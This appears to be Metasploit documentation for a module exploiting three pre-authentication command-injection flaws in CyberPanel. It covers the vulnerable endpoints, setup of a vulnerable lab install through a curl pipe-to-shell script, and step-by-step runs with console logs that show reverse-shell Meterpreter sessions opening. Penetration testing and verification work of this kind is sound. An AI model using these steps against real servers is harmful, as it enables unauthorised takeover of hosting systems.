## Vulnerable Application

CyberPanel is an open-source web hosting control panel based on OpenLiteSpeed.
This module exploits two pre-authenticated remote command execution (RCE) vulnerabilities found in certain versions of CyberPanel.

- **CVE-2024-51378**: The `getresetstatus` endpoint in `dns/views.py` and
`ftp/views.py` in CyberPanel before commit `1c0c6cb` allows remote attackers to
bypass authentication and execute arbitrary commands via `/dns/getresetstatus` or
`/ftp/getresetstatus` by bypassing `secMiddleware`(which applies only to POST
requests) and using shell metacharacters in the `statusfile` property.
This vulnerability has been exploited in the wild as of October 2024 by PSAUX, affecting versions through 2.3.6 and the unpatched 2.3.7.

- **CVE-2024-51567**: The `upgrademysqlstatus` endpoint in `databases/views.py` in
CyberPanel before commit `5b08cd6` allows remote attackers to bypass authentication
and execute arbitrary commands via `/dataBases/upgrademysqlstatus`, also by
bypassing `secMiddleware` and using shell metacharacters in the `statusfile` property.
This vulnerability has similarly been exploited in the wild in October 2024
by PSAUX, impacting versions through 2.3.6 and the unpatched 2.3.7.

- **CVE-2024-51568**: CyberPanel before 2.3.5 allows command
injection via completePath in the ProcessUtilities.outputExecutioner() sink.
This vulnerability includes unauthenticated remote code execution via shell
metacharacters in the /filemanager/upload (aka File Manager upload) endpoint,
exploiting shell metacharacters for arbitrary command execution.

These vulnerabilities allow attackers to execute commands on the server without needing authentication.

### Installation Instructions

To set up a vulnerable instance of CyberPanel for testing, follow these
instructions on an Ubuntu 18.04 server (or later).
The example below demonstrates installation on Ubuntu 18.04, though newer versions of Ubuntu should work as well.

1. First, install necessary dependencies and disable IPv6 to avoid potential network issues:

```bash
sudo su -
apt update && apt install -y curl wget
sysctl -w net.ipv6.conf.all.disable_ipv6=1
sysctl -w net.ipv6.conf.default.disable_ipv6=1
```

2. Then, download and run the CyberPanel installation script:

```bash
sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/install.sh)
```

3. During installation, choose the following options:
   - Install CyberPanel: Select option `1`
   - Install CyberPanel with OpenLiteSpeed: Select option `1`
   - Skip full installation (choose `n`)
   - Skip Postfix, PowerDNS, and PureFTPd installations
   - Skip Remote MySQL setup
   - Install CyberPanel version `2.3.4` when prompted
   - Decline Memcached and Redis installations
   - Decline WatchDog setup for Web service and Database service

## Verification Steps

1. Install CyberPanel as outlined above.
2. Start `msfconsole`.
3. Use the module path: `use exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve`.
4. Set the `RHOSTS` option to the target server’s IP.
5. Run the exploit with the desired CVE (choose either `cve-2024-51567`, `cve-2024-51568` or `cve-2024-51378`).
6. A successful exploitation should provide a shell on the target.

## Options

No option

## Scenarios

### Example: CVE-2024-51567 on CyberPanel 2.3.5 (Ubuntu 18.04)

To exploit `CVE-2024-51567` and achieve remote command execution:

```bash
msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51567
action => CVE-2024-51567
msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
[*] Sending stage (3045380 bytes) to 192.168.1.16
[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.16:35194) at 2024-11-21 22:26:12 +0100

meterpreter > sysinfo 
Computer     : 192.168.1.16
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### Example: CVE-2024-51378 on CyberPanel 2.3.5 (Ubuntu 18.04)

To exploit `CVE-2024-51378` and achieve remote command execution:

```bash
msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51378
action => CVE-2024-51378
msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
[*] Sending stage (3045380 bytes) to 192.168.1.16
[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.16:39820) at 2024-11-21 22:27:06 +0100

meterpreter > sysinfo 
Computer     : 192.168.1.16
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

### Example: CVE-2024-51568 on CyberPanel 2.3.4 (Ubuntu 18.04)

```bash
msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51568
action => CVE-2024-51568
msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] CSRF Token retrieved: CtCqolh8EQHkik3J8sjbUxPemD9PN8j2cZ7QBIxtUN3zmHQ1sbSnXOCBVWr00kI7
[*] CSRF Token retrieved: ExmQR7HciOpdsPRrh43NNjGNYaLbRb6pKnap4Z5onPfVGjPqCNFyehTAqIpBrSuB
[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
[*] CSRF Token retrieved: NMATUvqAxFW2bU5bnhvFf860BfFrj8DGMqtSXS81RbmxjifXo9sJCe1KM7933cIY
[*] Sending stage (3045380 bytes) to 192.168.1.16
[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 192.168.1.16:46212) at 2024-11-21 22:37:00 +0100

meterpreter > sysinfo 
Computer     : 192.168.1.16
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
